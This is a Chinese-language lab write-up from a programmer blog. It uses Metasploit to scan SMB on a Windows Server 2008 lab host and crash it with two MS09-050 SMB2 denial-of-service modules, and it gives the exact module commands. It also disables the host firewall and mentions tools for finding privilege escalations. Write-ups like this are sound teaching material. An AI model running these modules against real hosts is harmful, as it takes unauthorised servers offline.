AI智能
改变未来

Metasploit攻击winserver2008实例

Metasploit攻击winserver2008实例

一、实验目的

1)了解拒绝服务攻击的原理及其危害
2)了解SMB协议及其漏洞信息
3)使用Metasploit对win2008系统进行拒绝服务攻击

二、实验环境

漏洞主机:win server 2008,IP地址:10.1.1.144

攻击主机:Kali linux,IP地址:10.1.1.128

三、实验内容与实验要求

  1. 初步了解实验环境及信息收集
  2. 利用ms09_050_smb2_session_logoff漏洞攻击win server 2008主机
  3. 利用ms09_050_smb2_negotiate_pidhigh漏洞攻击win server 2008主机

四、实验过程与分析

实验步骤一
初步了解实验环境及信息收集
1.查看win server 2008漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机IP为10.1.1.144。使用命令如下:

whoami 查看当前登陆用户
ipconfig 查看网络配置信息

2.为了更好的演示攻击win server 2008系统实例需要关闭win server 2008系统的防火墙,win+R输入cmd,运行“netsh firewall set opmode mode=disable”命令

3.查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root ,IP为10.1.1.128
whoami 查看当前登陆用户
ifconfig 查看网络配置信息

在利用SMB漏洞进行DOS前需要先确定SMB的版本信息。下面利用metasploit自带的SMB扫描辅助模块来确定SMB的版本。
4.在kali中执行“msfconsole”,启动metasploit
service postgresql start 开启PostgreSQL数据库
msfconsole 启动metasploit

5.运行“use auxiliary/scanner/smb/smb_version”选择DOS攻击辅助模块
use auxiliary/scanner/smb/smb_version

6.show options查看配置选项
运行命令: show options

7.设置目标主机的IP,以及通过设置线程来提高扫描速度
set RHOSTS 10.1.1.144
set THREAD 10

8.开始运行,运行结束后SMB信息如下所示
run

实验步骤二
利用ms09_050_smb2_session_logoff漏洞攻击win server 2008主机
利用metasploit演示如何利用ms09_050_smb2_session_logoff漏洞对win server 2008进行DOS攻击。
1.在kali中执行“msfconsole”,启动metasploit
运行命令: service postgresql start 开启PostgreSQL数据库
运行命令:msfconsole 启动metasploit。如下图所示:

2.运行命令:“use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff”,选择DOS攻击辅助模块
use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff

3.运行命令:show options查看配置选项
show options

4.设置目标主机的IP,SMB服务的端口
运行命令: set RHOST 10.1.1.*
运行命令: set RPORT 445

5.开始攻击,出现下面的提示信息说明DOS攻击成功
运行命令: run -j

6.进一步验证攻击是否成功,查看win server 2008已经蓝屏

实验步骤三
利用ms09_050_smb2_negotiate_pidhigh漏洞攻击win server 2008主机
利用metasploit演示如何利用ms09_050_smb2_negotiate_pidhigh漏洞对win server 2008进行DOS攻击。

1.在kali中执行“msfconsole”,启动metasploitservice postgresql start      开启PostgreSQL数据库msfconsole   启动metasploit2.运行“use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh”选择DOS攻击辅助模块use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh3.show options查看配置选项show options4.设置目标主机的IP,SMB服务的端口set RHOST 10.1.1.*set RPORT 4455.开始攻击,出现下面的提示信息说明DOS攻击成功run -j6.进一步验证攻击是否成功,查看win server 2008已经蓝屏

1) 查阅资料思考有哪些有效途径可以防范大规模DOS攻击?
要避免系统免受DoS攻击,网络管理员要积极谨慎地维护系统,确保无安全隐患和漏洞;恶意攻击方式则需要安装防火墙等安全设备过滤DoS攻击,同时强烈建议网络管理员应当定期查看安全设备的日志,及时发现对系统的安全威胁行为。
2) 查阅微软漏洞更新信息,存在哪些由服务器常用软件(比如:IE)导致的高危漏洞能攻破未打任何补丁的win server 2008系统?
MS08-058:Internet Explorer累积性安全更新,Internet Explorer中存在多个远程执行代码或信息泄露的漏洞。如果计算机用户使用IE浏览器点击浏览了特制的恶意Web网页,恶意攻击者就可以远程执行任意代码,最终导致受攻击的操作系统无法正常工作。
3) 结合谷歌和exploit-db.com收集win server 2008提权工具,并了解其运行原理。
Exploit-Suggester:
下载微软的漏洞数据库python2 windows-exploit-suggester.py –update;
然后进行比对,并输出到exploit.txt文件中
python2 windows-exploit-suggester.py –database 2018-08-31-mssb.xls –systeminfo win7.txt > exploit.txt;

赞(0) 打赏
未经允许不得转载:爱站程序员基地 » Metasploit攻击winserver2008实例